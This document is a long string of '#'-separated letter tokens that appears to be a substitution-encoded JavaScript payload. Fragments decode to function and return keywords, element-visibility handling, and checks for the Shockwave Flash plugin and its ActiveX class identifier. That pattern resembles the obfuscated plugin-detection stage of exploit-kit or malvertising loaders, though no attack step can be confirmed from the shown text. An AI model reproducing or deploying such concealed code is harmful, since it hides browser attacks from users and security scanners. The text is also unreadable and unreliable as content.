e#tu#r#tu#tt#yy#yy#cw#ty#ro#tt#tq#cq#qu#ty#ro#tt#tq#qo#yi#ut#yy#yy#ie#ie#ie#w#tu#tt#yy#yy#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#cq#iq#uy#tt#uw#cqp#ty#qo#ur#yw#ye#ue#w#tt#qo#ty#r#ye#ue#we#uw#uw#tt#uo#cw#tu#cq#wq#tu#r#yy#to#yi#yq#ur#yw#qy#e#u#qu#ye#yp#cw#tt#wp#y#cr#cr#ty#r#ye#ue#wi#ut#yi#tu#cw#tu#ro#y#tq#cq#cq#iq#tu#ro#y#tq#cw#ty#w#tt#wp#u#wq#tu#ro#u#tq#qy#y#w#tt#wp#i#wq#tu#ro#i#tq#qy#y#w#tt#wp#o#wq#tu#ro#o#tq#qy#y#cq#ie#to#yy#ue#to#iq#ye#yp#cw#ty#r#ye#ue#wi#ut#yi#tu#cw#tu#cq#cq#iq#tu#cw#ty#cq#ie#ie#ie#w#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#to#yy#ye#yu#ye#ur#to#uw#qy#ci#w#ci#w#cy#cy#yq#to#ur#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#w#ti#w#tu#cq#iq#uy#tt#uw#cqp#to#qo#tt#r#ye#yi#ye#ur#cw#yq#cq#w#yp#w#ty#w#yw#qo#iq#ie#qu#ye#yp#cw#to#qi#y#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#qu#yp#qo#tt#r#up#yy#ut#yq#ye#yi#qu#ye#yp#cw#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#co#qo#u#cq#iq#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#yi#ut#yy#yy#w#ti#w#tu#cq#qu#ye#yp#cw#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#qo#qo#yi#ut#yy#yy#cq#iq#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#u#ie#ie#tt#r#tu#yy#to#tt#yi#ut#up#cw#cq#qu#ty#qo#cw#yp#r#uy#to#uw#ue#ye#yo#yi#iw#iw#yp#r#uy#to#uw#ue#ye#yo#yi#y#cq#qu#ty#qo#ty#wq#ty#r#uw#to#up#yy#tt#tu#to#cw#tt#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#w#tt#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#to#yy#ye#yu#ye#ur#to#uw#cq#qy#ty#qu#uw#to#ur#ut#uw#yi#cqp#ty#ie#ie#w#tu#yy#to#tt#yi#ut#up#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#ie#w#tt#ti#ti#rt#ye#yi#wu#uy#to#yi#ur#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#w#tu#cq#iq#uy#tt#uw#cqp#to#qo#ur#yw#ye#ue#w#tt#qo#uu#ye#yi#ti#yo#uu#w#ty#qu#ye#yp#cw#to#r#ye#ue#wi#ut#yi#tu#cw#tu#cq#cq#iq#ye#yp#cw#tt#r#tt#ti#ti#wu#uy#to#yi#ur#er#ye#ue#ur#to#yi#to#uw#cq#iq#tt#r#tt#ti#ti#wu#uy#to#yi#ur#er#ye#ue#ur#to#yi#to#uw#cw#ti#w#tu#w#yp#tt#yy#ue#to#cq#ie#to#yy#ue#to#iq#ye#yp#cw#tt#r#tt#ur#ur#tt#tu#yw#wu#uy#to#yi#ur#cq#iq#tt#r#tt#ur#ur#tt#tu#yw#wu#uy#to#yi#ur#cw#ci#yo#yi#ci#q#ti#w#tu#cq#ie#to#yy#ue#to#iq#ty#qo#tt#ro#ci#yo#yi#ci#q#ti#tq#qu#tt#ro#ci#yo#yi#ci#q#ti#tq#qo#to#r#uu#ye#yi#ep#tt#yi#ti#yy#to#uw#cw#tu#w#ty#cq#ie#ie#ie#ie#w#uu#ye#yi#ep#tt#yi#ti#yy#to#uw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#w#tu#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#ti#cw#cq#qu#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#tu#qo#qo#ci#yp#ut#yi#tu#ur#ye#yo#yi#ci#cq#iq#tu#cw#cq#ie#ie#ie#w#rt#er#yp#ut#yi#tu#ue#y#qy#ro#tq#w#rt#er#yp#ut#yi#tu#ue#qy#ro#tq#w#uw#ut#yi#rt#er#yp#ut#yi#tu#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uy#tt#uw#cqp#ty#qo#iq#ie#qu#tt#r#uu#ye#yi#er#yo#tt#ti#to#ti#qo#ur#uw#ut#to#qu#tt#r#tu#tt#yy#yy#we#uw#uw#tt#uo#cw#tt#r#rt#er#yp#ut#yi#tu#ue#y#cq#qu#tt#r#tu#tt#yy#yy#we#uw#uw#tt#uo#cw#tt#r#rt#er#yp#ut#yi#tu#ue#cq#qu#ye#yp#cw#tt#r#yo#yi#wy#yo#yi#to#wu#yu#up#ur#uo#wy#ye#uy#cq#iq#tt#r#yo#yi#wy#yo#yi#to#wu#yu#up#ur#uo#wy#ye#uy#cw#cq#ie#ie#w#uu#ye#yi#er#yo#tt#ti#to#ti#qy#yp#tt#yy#ue#to#w#cy#cy#yo#yi#rt#ye#yi#ti#yo#uu#er#yo#tt#ti#to#ti#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#ye#yp#cw#tt#r#uu#ye#yi#er#yo#tt#ti#to#ti#cq#iq#tt#r#tu#tt#yy#yy#cw#ty#cq#ie#to#yy#ue#to#iq#tt#r#yp#ei#ut#ue#yw#cw#ty#w#tt#r#rt#er#yp#ut#yi#tu#ue#cq#ie#ie#ie#w#ti#ye#uy#qy#yi#ut#yy#yy#w#ti#ye#uy#eq#wy#qy#ci#up#yy#ut#yq#ye#yi#ti#to#ur#to#tu#ur#ci#w#ti#ye#uy#rt#ye#ti#ur#yw#qy#qq#y#w#up#yy#ut#yq#ye#yi#rq#ye#ip#to#qy#u#w#to#yu#up#ur#uo#wy#ye#uy#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#ti#qo#ur#yw#ye#ue#w#ty#w#yw#w#tu#w#tt#w#yp#w#yq#qu#ye#yp#cw#ti#r#ti#ye#uy#cr#cr#ti#r#ti#ye#uy#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#cq#iq#yp#yo#uw#cw#ty#qo#ti#r#ti#ye#uy#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#r#yy#to#yi#yq#ur#yw#e#u#qu#ty#wp#qo#y#qu#ty#e#e#cq#iq#tu#qo#ti#r#ti#ye#uy#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#ro#ty#tq#qu#ye#yp#cw#tu#cr#cr#tu#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#cq#iq#yp#yo#uw#cw#yw#qo#tu#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#r#yy#to#yi#yq#ur#yw#e#u#qu#yw#wp#qo#y#qu#yw#e#e#cq#iq#yq#qo#tu#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#ro#yw#tq#qu#ur#uw#uo#iq#tu#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#yq#cq#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ie#ie#ye#yp#cw#tu#cq#iq#ur#uw#uo#iq#ti#r#ti#ye#uy#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#tu#cq#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ie#ie#ie#ye#yp#cw#co#ti#r#ti#ye#uy#cq#iq#tt#qo#ti#yo#tu#ut#yu#to#yi#ur#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#wr#uo#eq#ti#cw#ti#r#ti#ye#uy#eq#wy#cq#qu#ye#yp#cw#tt#cq#iq#ti#r#ti#ye#uy#qo#tt#ie#ie#ye#yp#cw#ti#r#ti#ye#uy#cr#cr#ti#r#ti#ye#uy#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#cq#iq#ur#uw#uo#iq#ti#r#ti#ye#uy#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#ti#r#ti#ye#uy#cq#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ti#r#ti#ye#uy#qo#yi#ut#yy#yy#ie#ie#w#wy#eu#ey#wu#yp#ut#yi#tu#ue#qy#ro#tq#w#yo#yi#wy#yo#yi#to#wu#yu#up#ur#uo#wy#ye#uy#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#tt#w#ty#qu#ye#yp#cw#co#tu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cq#iq#uw#to#ur#ut#uw#yi#ie#ye#yp#cw#tu#r#rt#er#yp#ut#yi#tu#ue#cr#cr#tu#r#rt#er#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#cr#cr#tu#r#rt#er#yp#ut#yi#tu#ue#ro#tu#r#rt#er#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#e#u#tq#co#qo#qo#yi#ut#yy#yy#cq#iq#uw#to#ur#ut#uw#yi#ie#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#tu#cq#iq#ty#qo#tu#ro#tt#tq#qu#ye#yp#cw#ty#cr#cr#ty#r#yp#ut#yi#tu#ue#cq#iq#ye#yp#cw#ty#r#eu#rw#wi#qo#qo#o#cq#iq#uw#to#ur#ut#uw#yi#ie#ye#yp#cw#ty#r#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#cr#cr#ty#r#yp#ut#yi#tu#ue#ro#ty#r#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#e#u#tq#co#qo#qo#yi#ut#yy#yy#cq#iq#uw#to#ur#ut#uw#yi#ie#ie#ie#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#tu#r#wy#eu#ey#wu#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#qu#tt#q#q#cq#iq#tu#r#tu#tt#yy#yy#we#uw#uw#tt#uo#cw#tu#r#wy#eu#ey#wu#yp#ut#yi#tu#ue#cq#ie#tu#r#to#yu#up#ur#uo#wy#ye#uy#cw#cq#ie#w#yq#to#ur#rt#ye#ti#ur#yw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#cq#iq#ye#yp#cw#tu#cq#iq#uy#tt#uw#cqp#tt#qo#tu#r#ue#tu#uw#yo#yy#yy#rt#ye#ti#ur#yw#iw#iw#tu#r#yo#yp#yp#ue#to#ur#rt#ye#ti#ur#yw#w#ty#qo#ur#yw#ye#ue#qu#ye#yp#cw#ty#r#ye#ue#ey#ut#yu#cw#tt#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#tt#ie#ie#uw#to#ur#ut#uw#yi#cqp#e#u#ie#w#yq#to#ur#rw#tt#yq#rq#ur#tt#ur#ut#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yu#w#yq#w#tt#w#ty#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#yp#w#yt#qo#yu#r#ue#up#tt#yi#w#yy#qo#tu#r#yq#to#ur#rt#ye#ti#ur#yw#cw#yt#cq#w#yw#qo#tt#r#ue#up#tt#yi#w#yr#qo#tu#r#yq#to#ur#rt#ye#ti#ur#yw#cw#yw#cq#w#ti#qo#yq#r#ue#up#tt#yi#w#ye#qo#tu#r#yq#to#ur#rt#ye#ti#ur#yw#cw#ti#cq#qu#ye#yp#cw#co#yt#iw#iw#co#yw#iw#iw#co#ti#iw#iw#co#tu#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#yu#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#i#ie#ye#yp#cw#yr#qi#ye#iw#iw#yy#qi#y#iw#iw#yr#qi#y#iw#iw#ye#qi#y#iw#iw#ye#qi#qo#tu#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#iw#iw#tu#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#qi#u#cq#iq#uw#to#ur#ut#uw#yi#cqp#y#ie#ye#yp#cw#yy#wp#qo#ye#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#u#ie#ur#uw#uo#iq#ye#yp#cw#yy#qo#qo#tu#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#cr#cr#cw#co#tu#r#ye#ue#eq#wu#iw#iw#tu#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#yu#cq#r#uw#to#tt#ti#uo#rq#ur#tt#ur#to#qo#qo#qp#cq#cq#iq#ye#yp#cw#co#yu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cr#cr#tu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ye#yp#cw#yu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cr#cr#tu#r#ye#ue#ey#ut#yu#cw#ty#cq#cq#iq#ye#yp#cw#co#tu#r#ye#ue#ey#ut#yu#cw#yu#r#tu#yo#ut#yi#ur#cq#cq#iq#yu#r#tu#yo#ut#yi#ur#qo#ty#ie#ye#yp#cw#ty#e#yu#r#tu#yo#ut#yi#ur#wp#qo#u#y#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ie#ie#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yq#to#ur#wy#eu#et#yo#ty#yr#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#w#tt#cq#iq#uy#tt#uw#cqp#yp#w#ti#qo#ur#yw#ye#ue#w#tu#qo#yq#wq#yq#r#ue#up#tt#yi#qy#y#w#ty#qo#tu#cr#cr#tu#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#wq#u#qy#y#qu#ur#uw#uo#iq#ye#yp#cw#ty#cr#cr#tt#cq#iq#tu#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#r#yp#yo#tu#ut#ue#cw#cq#ie#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#uw#to#ur#ut#uw#yi#cqp#ty#wq#tu#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#qy#yi#ut#yy#yy#ie#w#ue#to#ur#rq#ur#uo#yy#to#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#yq#cq#iq#uy#tt#uw#cqp#yp#qo#ty#r#ue#ur#uo#yy#to#w#tt#w#ti#w#tu#qo#ur#yw#ye#ue#qu#ye#yp#cw#yp#cr#cr#yq#cq#iq#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#yq#r#yy#to#yi#yq#ur#yw#qu#tt#qo#tt#q#i#cq#iq#ur#uw#uo#iq#yp#ro#yq#ro#tt#tq#tq#qo#yq#ro#tt#q#u#tq#ie#tu#tt#ur#tu#yw#cw#ti#cq#iq#ie#ie#ie#ie#w#ye#yi#ue#to#uw#ur#wy#ye#uy#eq#yi#wr#yo#ti#uo#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#w#ye#cq#iq#uy#tt#uw#cqp#yw#w#yp#qo#ur#yw#ye#ue#w#ty#qo#ci#up#ti#o#o#qt#qt#o#o#qt#qt#ci#w#ti#qo#yi#ut#yy#yy#w#yr#qo#ye#wq#uu#ye#yi#ti#yo#uu#r#ur#yo#up#r#ti#yo#tu#ut#yu#to#yi#ur#qy#uu#ye#yi#ti#yo#uu#r#ti#yo#tu#ut#yu#to#yi#ur#w#tu#qo#ci#qi#ci#w#yq#qo#cw#yr#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cw#ci#ty#yo#ti#uo#ci#cq#ro#y#tq#iw#iw#yr#r#ty#yo#ti#uo#cq#qu#ye#yp#cw#co#yq#cq#iq#ur#uw#uo#iq#yr#r#uu#uw#ye#ur#to#cw#tu#q#ce#ti#ye#uy#cqp#ye#ti#qo#ci#ce#q#ty#q#ce#ci#wp#yo#ce#q#tu#q#ci#t#ti#ye#uy#wp#ci#cq#qu#ti#qo#yr#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#wr#uo#eq#ti#cw#ty#cq#ie#tu#tt#ur#tu#yw#cw#yw#cq#iq#ie#ie#yq#qo#cw#yr#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cw#ci#ty#yo#ti#uo#ci#cq#ro#y#tq#iw#iw#yr#r#ty#yo#ti#uo#cq#qu#ye#yp#cw#yq#cq#iq#ye#yp#cw#yq#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#cr#cr#yp#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#yq#r#ye#yi#ue#to#uw#ur#wr#to#yp#yo#uw#to#cq#cq#iq#yq#r#ye#yi#ue#to#uw#ur#wr#to#yp#yo#uw#to#cw#tt#w#yq#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#cq#ie#to#yy#ue#to#iq#yq#r#tt#up#up#to#yi#ti#wt#yw#ye#yy#ti#cw#tt#cq#ie#ye#yp#cw#ti#cq#iq#yq#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#ti#cq#ie#ie#to#yy#ue#to#iq#ie#ie#w#ye#yi#ue#to#uw#ur#ep#rw#et#er#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#w#ty#w#yw#w#tt#w#yt#cq#iq#uy#tt#uw#cqp#yy#w#yu#qo#ti#yo#tu#ut#yu#to#yi#ur#w#yr#qo#ur#yw#ye#ue#w#up#w#yo#qo#yu#r#tu#uw#to#tt#ur#to#wu#yy#to#yu#to#yi#ur#cw#ci#ue#up#tt#yi#ci#cq#w#yi#w#ye#w#yp#qo#ci#qi#ci#qu#uy#tt#uw#cqp#tu#qo#ro#ci#yo#ut#ur#yy#ye#yi#to#rq#ur#uo#yy#to#ci#w#ci#yi#yo#yi#to#ci#w#ci#ty#yo#uw#ti#to#uw#rq#ur#uo#yy#to#ci#w#ci#yi#yo#yi#to#ci#w#ci#up#tt#ti#ti#ye#yi#yq#ci#w#ci#y#up#ui#ci#w#ci#yu#tt#uw#yq#ye#yi#ci#w#ci#y#up#ui#ci#w#ci#uy#ye#ue#ye#ty#ye#yy#ye#ur#uo#ci#w#ci#uy#ye#ue#ye#ty#yy#to#ci#tq#qu#ye#yp#cw#co#yr#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#tt#cq#cq#iq#tt#qo#ci#ci#ie#ye#yp#cw#yr#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#yq#cq#cr#cr#cw#t#ro#tw#tp#ue#tq#t#cq#r#ur#to#ue#ur#cw#yq#cq#cq#iq#up#qo#yp#q#yq#q#ce#cqp#uu#ye#ti#ur#yw#qo#ci#ce#q#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#ce#ci#cqp#yw#to#ye#yq#yw#ur#qo#ci#ce#q#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#ce#ci#cqp#ce#qu#yp#yo#uw#cw#yi#qo#y#qu#yi#qi#ty#r#yy#to#yi#yq#ur#yw#qu#yi#qo#yi#q#i#cq#iq#ye#yp#cw#t#ro#tw#tp#ue#tq#t#r#ur#to#ue#ur#cw#ty#ro#yi#q#u#tq#cq#cq#iq#up#q#qo#ty#ro#yi#tq#q#ce#qo#ci#ce#q#ty#ro#yi#q#u#tq#q#ce#ci#cqp#ce#ie#ie#up#q#qo#ci#wp#ci#qu#yp#yo#uw#cw#yi#qo#y#qu#yi#qi#yw#r#yy#to#yi#yq#ur#yw#qu#yi#qo#yi#q#i#cq#iq#ye#yp#cw#t#ro#tw#tp#ue#tq#t#r#ur#to#ue#ur#cw#yw#ro#yi#q#u#tq#cq#cq#iq#up#q#qo#yp#q#ce#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ci#ce#q#yw#ro#yi#tq#q#ce#ci#cqp#uy#tt#yy#ut#to#qo#ci#ce#q#yw#ro#yi#q#u#tq#q#ce#ci#cqp#t#wp#ce#ie#ie#up#q#qo#tt#q#yp#q#ci#t#ci#q#yq#q#ci#wp#ci#ie#to#yy#ue#to#iq#up#qo#tt#ie#ye#yp#cw#co#yr#r#ti#ye#uy#cq#iq#ye#qo#yu#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#wr#uo#eq#ti#cw#yr#r#ti#ye#uy#eq#wy#cq#qu#ye#yp#cw#ye#cq#iq#yr#r#ti#ye#uy#qo#ye#ie#to#yy#ue#to#iq#yr#r#ti#ye#uy#qo#yu#r#tu#uw#to#tt#ur#to#wu#yy#to#yu#to#yi#ur#cw#ci#ti#ye#uy#ci#cq#qu#yr#r#ti#ye#uy#r#ye#ti#qo#yr#r#ti#ye#uy#eq#wy#qu#yr#r#ye#yi#ue#to#uw#ur#wy#ye#uy#eq#yi#wr#yo#ti#uo#cw#yr#r#ti#ye#uy#cq#ie#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yr#r#ti#ye#uy#w#tu#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#uu#ye#ti#ur#yw#ci#w#yr#r#ti#ye#uy#rt#ye#ti#ur#yw#q#ci#up#ui#ci#w#ci#yw#to#ye#yq#yw#ur#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#yp#yo#yi#ur#rq#ye#ip#to#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#yy#ye#yi#to#ep#to#ye#yq#yw#ur#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#uy#to#uw#ur#ye#tu#tt#yy#we#yy#ye#yq#yi#ci#w#ci#ty#tt#ue#to#yy#ye#yi#to#ci#w#ci#ti#ye#ue#up#yy#tt#uo#ci#w#ci#ty#yy#yo#tu#yt#ci#tq#cq#cq#qu#ye#yp#cw#co#ye#cq#iq#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yr#r#ti#ye#uy#w#ro#ci#up#yo#ue#ye#ur#ye#yo#yi#ci#w#ci#tt#ty#ue#yo#yy#ut#ur#to#ci#w#ci#uw#ye#yq#yw#ur#ci#w#ci#y#up#ui#ci#w#ci#ur#yo#up#ci#w#ci#y#up#ui#ci#tq#cq#ie#ie#ye#yp#cw#yr#r#ti#ye#uy#cr#cr#yr#r#ti#ye#uy#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#cq#iq#yr#r#ti#ye#uy#r#tt#up#up#to#yi#ti#wt#yw#ye#yy#ti#cw#yo#cq#qu#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yo#w#tu#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#yp#yo#yi#ur#rq#ye#ip#to#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#yy#ye#yi#to#ep#to#ye#yq#yw#ur#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#uy#to#uw#ur#ye#tu#tt#yy#we#yy#ye#yq#yi#ci#w#ci#ty#tt#ue#to#yy#ye#yi#to#ci#w#ci#ti#ye#ue#up#yy#tt#uo#ci#w#ci#ye#yi#yy#ye#yi#to#ci#tq#cq#cq#qu#ur#uw#uo#iq#ye#yp#cw#yo#cr#cr#yo#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#cq#iq#yo#r#yp#yo#tu#ut#ue#cw#cq#ie#ie#tu#tt#ur#tu#yw#cw#yy#cq#iq#ie#ur#uw#uo#iq#yo#r#ye#yi#yi#to#uw#ep#rw#et#er#qo#up#ie#tu#tt#ur#tu#yw#cw#yy#cq#iq#ie#ye#yp#cw#yo#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#r#yy#to#yi#yq#ur#yw#qo#qo#u#cr#cr#co#cw#yr#r#ye#ue#wo#to#tu#yt#yo#cr#cr#yr#r#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#cw#yr#r#uy#to#uw#wo#to#tu#yt#yo#w#ci#u#w#qq#w#y#w#y#ci#cq#qi#y#cq#cq#iq#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yo#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#w#tu#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#ti#ye#ue#up#yy#tt#uo#ci#w#ci#ye#yi#yy#ye#yi#to#ci#tq#cq#cq#ie#uw#to#ur#ut#uw#yi#iq#ue#up#tt#yi#qy#yo#w#uu#ye#yi#er#yo#tt#ti#to#ti#qy#yr#r#uu#ye#yi#er#yo#tt#ti#to#ti#w#ur#tt#yq#ey#tt#yu#to#qy#cw#yr#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#yq#cq#wq#yq#qy#ci#ci#cq#ie#ie#uw#to#ur#ut#uw#yi#iq#ue#up#tt#yi#qy#yi#ut#yy#yy#w#uu#ye#yi#er#yo#tt#ti#to#ti#qy#yr#r#uu#ye#yi#er#yo#tt#ti#to#ti#w#ur#tt#yq#ey#tt#yu#to#qy#ci#ci#ie#ie#w#yp#yy#tt#ue#yw#qy#iq#yu#ye#yu#to#rw#uo#up#to#qy#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#ui#e#ue#yw#yo#tu#yt#uu#tt#uy#to#e#yp#yy#tt#ue#yw#ci#w#up#uw#yo#yq#eq#wy#qy#ci#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#r#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#ci#w#tu#yy#tt#ue#ue#eq#wy#qy#ci#tu#yy#ue#ye#ti#qy#wy#i#qe#wt#wy#wr#qw#wu#e#we#wu#qw#wy#e#u#u#wt#wi#e#qt#qw#wr#qr#e#qp#qp#qp#qq#qq#o#qq#qp#y#y#y#y#ci#w#yq#to#ur#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#ty#qo#yp#ut#yi#tu#ur#ye#yo#yi#cw#ye#cq#iq#ye#yp#cw#co#ye#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#uy#tt#uw#cqp#to#qo#t#ro#tp#ti#tq#ro#tp#ti#tp#w#tp#r#tp#ue#tq#p#ro#uw#rp#ti#wy#tq#iq#y#w#u#ie#ro#tp#ti#tp#w#tq#p#t#r#to#ui#to#tu#cw#ye#cq#qu#uw#to#ur#ut#uw#yi#cqp#to#wq#to#ro#y#tq#r#uw#to#up#yy#tt#tu#to#cw#t#ro#uw#rp#ti#wy#tp#r#tq#t#yq#w#ci#w#ci#cq#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#qy#yi#ut#yy#yy#ie#qu#uy#tt#uw#cqp#yr#qo#ur#yw#ye#ue#w#yq#qo#yr#r#cy#w#yt#w#yw#w#yy#qo#yi#ut#yy#yy#w#tu#qo#yi#ut#yy#yy#w#tt#qo#yi#ut#yy#yy#w#yp#w#yu#w#ti#qu#ye#yp#cw#co#yq#r#ye#ue#eq#wu#cq#iq#yu#qo#yq#r#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#yr#r#yu#ye#yu#to#rw#uo#up#to#cq#qu#ye#yp#cw#yu#cq#iq#yp#qo#yq#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#yq#r#ye#yi#ue#to#uw#ur#ep#rw#et#er#cw#ci#yo#ty#yr#to#tu#ur#ci#w#ro#ci#ur#uo#up#to#ci#w#yr#r#yu#ye#yu#to#rw#uo#up#to#tq#w#ro#tq#w#ci#ci#w#yr#cq#cq#qu#ur#uw#uo#iq#yy#qo#yq#r#yq#to#ur#ey#ut#yu#cw#yp#r#wo#to#ur#rr#tt#uw#ye#tt#ty#yy#to#cw#ci#cy#uy#to#uw#ue#ye#yo#yi#ci#cq#cq#ie#tu#tt#ur#tu#yw#cw#yt#cq#iq#ie#ie#ye#yp#cw#co#yy#cq#iq#ti#qo#yu#wq#yu#r#to#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#qy#yi#ut#yy#yy#qu#ye#yp#cw#ti#cr#cr#ti#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#iq#yy#qo#ty#cw#ti#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#ie#ye#yp#cw#yy#cq#iq#yy#qo#yq#r#yq#to#ur#ei#yy#ut#yq#ye#yi#wi#ye#yy#to#rr#to#uw#ue#ye#yo#yi#cw#ti#w#yy#cq#ie#ie#ie#to#yy#ue#to#iq#yp#yo#uw#cw#yw#qo#u#qq#qu#yw#wp#i#qu#yw#e#e#cq#iq#tu#qo#yq#r#yq#to#ur#we#ry#eu#cw#yr#r#up#uw#yo#yq#